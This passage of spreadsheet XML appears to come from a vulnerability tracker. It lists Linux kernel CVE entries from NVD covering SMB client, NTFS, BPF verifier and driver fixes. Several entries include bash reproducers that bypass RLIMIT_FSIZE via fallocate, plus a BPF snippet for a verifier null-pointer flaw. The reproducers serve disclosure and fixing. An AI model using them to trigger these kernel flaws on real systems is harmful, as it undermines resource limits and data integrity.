                # Generate four 1 MiB random blocks: [A][B][C][D].
                dd if=/dev/urandom of=/tmp/src bs=1M count=4 status=none
                # Expected contents after zeroing B: [A][zero][C][D].
                cp /tmp/src /tmp/expected
                dd if=/dev/zero of=/tmp/expected bs=1M seek=1 count=1 \
                        conv=notrunc status=none
                cp /tmp/src "$FILE"
                # Populate FS-Cache, then discard the page cache.
                sync
                echo 1 &gt; /proc/sys/vm/drop_caches
                cat "$FILE" &gt; /dev/null
                sync
                echo 1 &gt; /proc/sys/vm/drop_caches
                fallocate --zero-range -o 1M -l 1M "$FILE"
                if cmp -s /tmp/expected "$FILE"; then
                        echo "readback: OK"
                else
                        echo "readback: STALE DATA"
                fi
        '
Before this change, the readback differs from /tmp/expected:
        readback: STALE DATA
After this change, it matches:
        readback: OK</t>
        </is>
      </c>
      <c r="T740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98124</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98125</t>
        </is>
      </c>
      <c r="D741" s="5" t="inlineStr"/>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="inlineStr"/>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K741" s="5" t="inlineStr"/>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q741" s="5" t="inlineStr"/>
      <c r="R741" s="5" t="inlineStr"/>
      <c r="S741" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: fix stale page cache in insert/collapse range
smb3_insert_range() and smb3_collapse_range() use
truncate_pagecache_range() to invalidate the affected page cache.
However, if off or old_eof is not page-aligned, the boundary pages are
only partially zeroed and remain uptodate. As a result, the client may
return stale data after a successful insert/collapse range operation.
For example, with 4K pages:
    page 0          page 1          page 2
    0------4K       4K------8K      8K------12K
       ^                                ^
    off=2K                       old_eof=10K
Page 1 is removed from the page cache, while the boundary pages are
only partially zeroed. After COPYCHUNK moves the data on the server,
these cached pages may still return stale data.
This can be reproduced on a CIFS mount:
    bash -c '
            FILE=/mnt/scratch/repro
            # Use a 6 KiB file so EOF is not page-aligned.
            dd if=/dev/urandom of=/tmp/src bs=1K count=6 status=none
            # Expected: a 4 KiB hole followed by the original data.
            rm -f /tmp/expected
            truncate -s 4K /tmp/expected
            cat /tmp/src &gt;&gt; /tmp/expected
            cp /tmp/src "$FILE"
            # Prime the page cache before moving data on the server.
            cat "$FILE" &gt; /dev/null
            fallocate --insert-range -o 0 -l 4K "$FILE"
            if cmp -s /tmp/expected "$FILE"; then
                    echo "readback: OK"
            else
                    echo "readback: STALE DATA"
            fi
    '
Fix this by writing back dirty data and discarding the page cache from
the start of the page containing off to EOF before moving data on the
server.</t>
        </is>
      </c>
      <c r="T741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98125</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98126</t>
        </is>
      </c>
      <c r="D742" s="5" t="inlineStr"/>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="inlineStr"/>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr"/>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q742" s="5" t="inlineStr"/>
      <c r="R742" s="5" t="inlineStr"/>
      <c r="S742" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: validate new EOF for zero range
When FALLOC_FL_ZERO_RANGE is used without FALLOC_FL_KEEP_SIZE,
smb3_zero_range() may extend EOF without checking RLIMIT_FSIZE, allowing
the file to grow beyond the caller's file-size limit.
Fix this by calling inode_newsize_ok() before sending the zero-range
request when the operation would extend EOF.
Reproducer, using a file on a CIFS mount:
	bash -c '
	        FILE=/mnt/cifs/repro
	        trap "" SIGXFSZ
	        ulimit -f 3072
	        truncate -s 2M "$FILE"
	        fallocate --zero-range -o 0 -l 4M "$FILE"
	        echo "fallocate rc=$?"
	        stat -c "file size=%s" "$FILE"
	'
Before this change, the operation succeeds despite the 3 MiB limit:
	fallocate rc=0
	file size=4194304
After this change, fallocate fails and leaves the file at 2 MiB.</t>
        </is>
      </c>
      <c r="T742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98126</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98127</t>
        </is>
      </c>
      <c r="D743" s="5" t="inlineStr"/>
      <c r="E743" s="5" t="inlineStr"/>
      <c r="F743" s="5" t="inlineStr"/>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="inlineStr"/>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr"/>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q743" s="5" t="inlineStr"/>
      <c r="R743" s="5" t="inlineStr"/>
      <c r="S743" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: validate new EOF for insert range
smb3_insert_range() does not check if the new file size
(i_size + len) is valid. This allows FALLOC_FL_INSERT_RANGE to bypass
RLIMIT_FSIZE, exceed s_maxbytes, or produce a size outside the loff_t
range.
Use check_add_overflow() to calculate the new EOF. Validate it with
inode_newsize_ok() before modifying the file.
Reproducer, using a file on a CIFS mount:
	bash -c '
		FILE=/mnt/cifs/repro
		trap "" SIGXFSZ
		ulimit -f 3072		# RLIMIT_FSIZE = 3 MiB
		# A regular write is stopped at 3 MiB.
		dd if=/dev/zero of="$FILE" bs=1M count=4 status=none
		stat -c "size after write: %s" "$FILE"
		# Insert 2 MiB into a 2 MiB file.
		truncate -s 2M "$FILE"
		fallocate -i -o 0 -l 2M "$FILE"
		stat -c "size after insert: %s" "$FILE"
	'
Before this change, the regular write stops at the 3 MiB limit, but
insert range grows the file to 4 MiB:
	dd: error writing '/mnt/cifs/repro': File too large
	size after write: 3145728
	size after insert: 4194304
After this change, insert range also fails at the limit and leaves the
2 MiB file unchanged:
	dd: error writing '/mnt/cifs/repro': File too large
	size after write: 3145728
	fallocate: fallocate failed: File too large
	size after insert: 2097152</t>
        </is>
      </c>
      <c r="T743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98127</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98128</t>
        </is>
      </c>
      <c r="D744" s="5" t="inlineStr"/>
      <c r="E744" s="5" t="inlineStr"/>
      <c r="F744" s="5" t="inlineStr"/>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="inlineStr"/>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K744" s="5" t="inlineStr"/>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q744" s="5" t="inlineStr"/>
      <c r="R744" s="5" t="inlineStr"/>
      <c r="S744" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpi3mr: Fix target device refcount leak in mpi3mr_sas_port_add()
mpi3mr_get_tgtdev_by_addr() increments the target device kref when it
returns a device. If a subsequent error triggers a goto out_fail after
the tgtdev reference is acquired, the reference is never released
because the out_fail path does not call mpi3mr_tgtdev_put(). This
prevents the target device structure from ever being freed.
Add a tgtdev put in the out_fail path, guarded by a NULL check since
tgtdev is only acquired for SAS_END_DEVICE types and the same cleanup
path is shared by earlier error cases where tgtdev is still NULL.</t>
        </is>
      </c>
      <c r="T744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98128</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98129</t>
        </is>
      </c>
      <c r="D745" s="5" t="inlineStr"/>
      <c r="E745" s="5" t="inlineStr"/>
      <c r="F745" s="5" t="inlineStr"/>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="inlineStr"/>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr"/>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q745" s="5" t="inlineStr"/>
      <c r="R745" s="5" t="inlineStr"/>
      <c r="S745" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpi3mr: Fix NULL pointer dereference in mpi3mr_sas_port_add()
sas_port_alloc_num() can return NULL on memory allocation failure. The
return value is passed directly to sas_port_add() without a NULL check,
which causes a NULL pointer dereference.
Additionally, if sas_port_add() fails, the allocated port is not freed
before jumping to out_fail, leaking the sas_port structure. Call
sas_port_free() to properly release it.</t>
        </is>
      </c>
      <c r="T745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98129</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98131</t>
        </is>
      </c>
      <c r="D746" s="5" t="inlineStr"/>
      <c r="E746" s="5" t="inlineStr"/>
      <c r="F746" s="5" t="inlineStr"/>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="inlineStr"/>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr"/>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q746" s="5" t="inlineStr"/>
      <c r="R746" s="5" t="inlineStr"/>
      <c r="S746" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix dma mapping leak in stmmac_tso_xmit()
In stmmac_tso_xmit(), if the DMA mapping of an skb fragment fails, the
frame is dropped but the DMA mappings already created for the linear
part and for the fragments mapped before the failure are never
unmapped, leaking DMA mappings.
Fix the leak by walking back over the descriptors used by the frame and
releasing each of them with stmmac_free_tx_buffer(). Moreover, release
the descriptors with stmmac_release_tx_desc() unmapping the DMA buffers.</t>
        </is>
      </c>
      <c r="T746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98131</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98132</t>
        </is>
      </c>
      <c r="D747" s="5" t="inlineStr"/>
      <c r="E747" s="5" t="inlineStr"/>
      <c r="F747" s="5" t="inlineStr"/>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="inlineStr"/>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr">
        <is>
          <t>checkpoint, go</t>
        </is>
      </c>
      <c r="K747" s="5" t="inlineStr"/>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q747" s="5" t="inlineStr"/>
      <c r="R747" s="5" t="inlineStr"/>
      <c r="S747" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: don't downgrade half-dead scalar zero spills to STACK_ZERO
states.c:__clean_func_state() can downgrade scalar zero spill to
STACK_ZERO in the following case:
  *(u64 *)(r10 - 8) = 0;
  ... checkpoint ...
  r1 = *(u32 *)(r10 - 4);
  ... no reads from r10-8 ...
Here 4 bytes at r10-8 are dead and verifier changes scalar spill to a
combination: 0000pppp (p stands for poison). Such a change breaks
precision propagation chains. All places that produce STACK_ZERO
should call bpf_mark_chain_precision() for the zero source.
This patch fixes the bug in a simplest way possible:
avoids converting stack spills of zero to STACK_ZERO.
Two smarter approaches are possible:
- do bpf_mark_chain_precision() from __clean_func_state()
- check slot liveness information in check_stack_write_fixed_off()
I investigated both and the changes required are a bit tricky,
hence go with a simple fix for the time being.</t>
        </is>
      </c>
      <c r="T747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98132</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98133</t>
        </is>
      </c>
      <c r="D748" s="5" t="inlineStr"/>
      <c r="E748" s="5" t="inlineStr"/>
      <c r="F748" s="5" t="inlineStr"/>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="inlineStr"/>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr"/>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q748" s="5" t="inlineStr"/>
      <c r="R748" s="5" t="inlineStr"/>
      <c r="S748" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: leave HasEA flag untouched on setxattr failure
In ntfs_set_ea(), the exit path unconditionally updates the HasEA
flag based on ea_info_qsize. When an error occurs before
ea_info_qsize is updated, NInoClearHasEA() hides existing on-disk
EAs until the inode is evicted.
Only update the flag on success.</t>
        </is>
      </c>
      <c r="T748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98133</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98134</t>
        </is>
      </c>
      <c r="D749" s="5" t="inlineStr"/>
      <c r="E749" s="5" t="inlineStr"/>
      <c r="F749" s="5" t="inlineStr"/>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="inlineStr"/>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K749" s="5" t="inlineStr"/>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q749" s="5" t="inlineStr"/>
      <c r="R749" s="5" t="inlineStr"/>
      <c r="S749" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: check_cond_jmp_op(): properly infer if register is null
Nicholas Carlini reported a bug when verifier can incorrectly infer
that a pointer is non-null. The bug occurs when two pointers are
compared and one of them has a type w/o PTR_MAYBE_NULL flag,
but which allows a value to be NULL at runtime.
Here is an example:
  // `a` is PTR_TO_MEM | MEM_RDONLY | PTR_UNTRUSTED
  // `a` is 0 at runtime.
  // `b` is PTR_TO_MAP_VALUE | PTR_MAYBE_NULL
  void *a = bpf_rdonly_cast(0, 0);
  int  *b = bpf_map_lookup_elem(...);
  if (a == b)
    *b = 42;  // verifier does not catch null pointer dereference
This happens because of a special case in check_cond_jmp_op(),
which attempts to strip PTR_MAYBE_NULL flags from pointer types,
when processing comparisons like `rA == rB`, if either rA or rB can't
be null.
The non-null property is derived based on the absence of
PTR_MAYBE_NULL flag on rA's or rB's type. But that is not sufficient
for types like PTR_TO_MEM, as in the example.
This patch replaces type_may_be_null() call with reg_not_null(),
which contains an allowlist of types for which absence of
PTR_MAYBE_NULL actually means that the value can't be NULL at runtime.
At the moment, the list in the reg_not_null() omits two types for
which PTR_MAYBE_NULL is applicable: PTR_TO_XDP_SOCK and PTR_TO_BUF.
In order to remain backward compatible, and assuming that only
comparison between pointers of the same type makes sense,
this commit extends reg_not_null(). W/o such an extension e.g.
verifier_jeq_infer_not_null/null_ptr_to_map_value fails.
reg_not_null() can be extended further, but I deem that out of scope
for the fix at hand. Explicit base_type(...) != PTR_TO_BTF_ID
checks in the check_cond_jmp_op() can be removed with migration to
reg_not_null(), but that is a behavioural change, as the special case
would start matching for PTR_TO_BTF_ID that is also is_trusted_reg().
I omit the behavioural change from this commit.</t>
        </is>
      </c>
      <c r="T749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98134</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98135</t>
        </is>
      </c>
      <c r="D750" s="5" t="inlineStr"/>
      <c r="E750" s="5" t="inlineStr"/>
      <c r="F750" s="5" t="inlineStr"/>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="inlineStr"/>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr"/>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q750" s="5" t="inlineStr"/>
      <c r="R750" s="5" t="inlineStr"/>
      <c r="S750" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: reject invalid sectors_per_cluster in the boot sector
is_boot_sector_ntfs() checks the boot sector's sectors_per_cluster field
with a range test that rejects 0x81..0xf3 but accepts 0 and other
non-power-of-two counts. A zero value reaches parse_ntfs_boot_sector():
	sectors_per_cluster_bits = ffs(sectors_per_cluster) - 1;
	...
	vol-&gt;cluster_size = vol-&gt;sector_size &lt;&lt; sectors_per_cluster_bits;
ffs(0) is 0, so sectors_per_cluster_bits becomes (unsigned)-1 and the
shift is undefined:
  UBSAN: shift-out-of-bounds in fs/ntfs/super.c:673:39
  shift exponent 4294967295 is too large for 32-bit type 'int'
This change rejects any non-power-of-two value, since it feeds the
aforementioned shift via ffs() - 1, which only yields the correct shift for a
power of two.</t>
        </is>
      </c>
      <c r="T750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98135</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98136</t>
        </is>
      </c>
      <c r="D751" s="5" t="inlineStr"/>
      <c r="E751" s="5" t="inlineStr"/>
      <c r="F751" s="5" t="inlineStr"/>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="inlineStr"/>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr"/>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q751" s="5" t="inlineStr"/>
      <c r="R751" s="5" t="inlineStr"/>
      <c r="S751" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: bound $AttrDef table walk to the loaded table size
ntfs_attr_find_in_attrdef() walks the in-memory $AttrDef table, but the
loop condition bounds only the start of each entry, not the whole entry:
	for (ad = vol-&gt;attrdef; (u8 *)ad - (u8 *)vol-&gt;attrdef &lt;
			vol-&gt;attrdef_size &amp;&amp; ad-&gt;type; ++ad)
struct attr_def is 160 bytes; the guard reads ad-&gt;type at offset 128 and
the loop body reads further fields. vol-&gt;attrdef is kvzalloc(i_size),
where i_size is the on-disk $AttrDef data size, checked in
load_and_init_attrdef() only as 0 &lt; i_size &lt;= 0x7fffffff. A volume whose
$AttrDef data size is smaller than one entry (e.g. 120 bytes) makes the
read of ad-&gt;type run past the allocation. Creating a file reaches this
through ntfs_attr_size_bounds_check() and reads out of bounds:
  BUG: KASAN: slab-out-of-bounds in ntfs_attr_find_in_attrdef+0x66/0xa0
  Read of size 4 at addr ffff888005833280 by task init/1
   ntfs_attr_find_in_attrdef
   ntfs_attr_size_bounds_check
   ntfs_attr_can_be_non_resident
   ntfs_attr_add
Require the whole entry to lie within attrdef_size in the loop guard, and
reject at mount a $AttrDef too small to hold one attr_def entry.</t>
        </is>
      </c>
      <c r="T751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98136</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98137</t>
        </is>
      </c>
      <c r="D752" s="5" t="inlineStr"/>
      <c r="E752" s="5" t="inlineStr"/>
      <c r="F752" s="5" t="inlineStr"/>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="inlineStr"/>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K752" s="5" t="inlineStr"/>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q752" s="5" t="inlineStr"/>
      <c r="R752" s="5" t="inlineStr"/>
      <c r="S752" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: treat any nonzero dio zero-range return as an error
ntfs_dio_zero_range() returns either 0 or a negative errno from
blkdev_issue_zeroout(); it never returns a positive value.  The
zeroing failure check in ntfs_attr_fallocate() therefore never fired,
so a failed zeroing operation was silently ignored: the loop kept
going, the newly allocated clusters were folded into initialized_size
and the write could succeed leaving stale on-disk data.
Treat any nonzero return as an error and abort the allocation.</t>
        </is>
      </c>
      <c r="T752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98137</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98138</t>
        </is>
      </c>
      <c r="D753" s="5" t="inlineStr"/>
      <c r="E753" s="5" t="inlineStr"/>
      <c r="F753" s="5" t="inlineStr"/>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="inlineStr"/>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr"/>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q753" s="5" t="inlineStr"/>
      <c r="R753" s="5" t="inlineStr"/>
      <c r="S753" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: do not mark the volume clean in sync_fs when errors were recorded
ntfs_put_super() and the remount-read-only path both clear the dirty bit
only when NVolErrors(vol) is false. ntfs_sync_fs() clears it
unconditionally, so any sync() on a volume that recorded an error marks
that volume clean. A volume without this set is then seen as not needing
recovery and it does not run one, so whatever went wrong is never repaired.
This change skips resetting the dirty bit when there are volume errors.
Reproduced on a volume whose $MFTMirr does not match $MFT, which sets the
error flag while leaving the mount read-write: after a write and a sync,
the on-disk volume flags read 0x0000 with this driver and 0x0001 with the
guard in place.</t>
        </is>
      </c>
      <c r="T753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98138</t>
        </is>
      </c>
    </row>
    <row r="754">
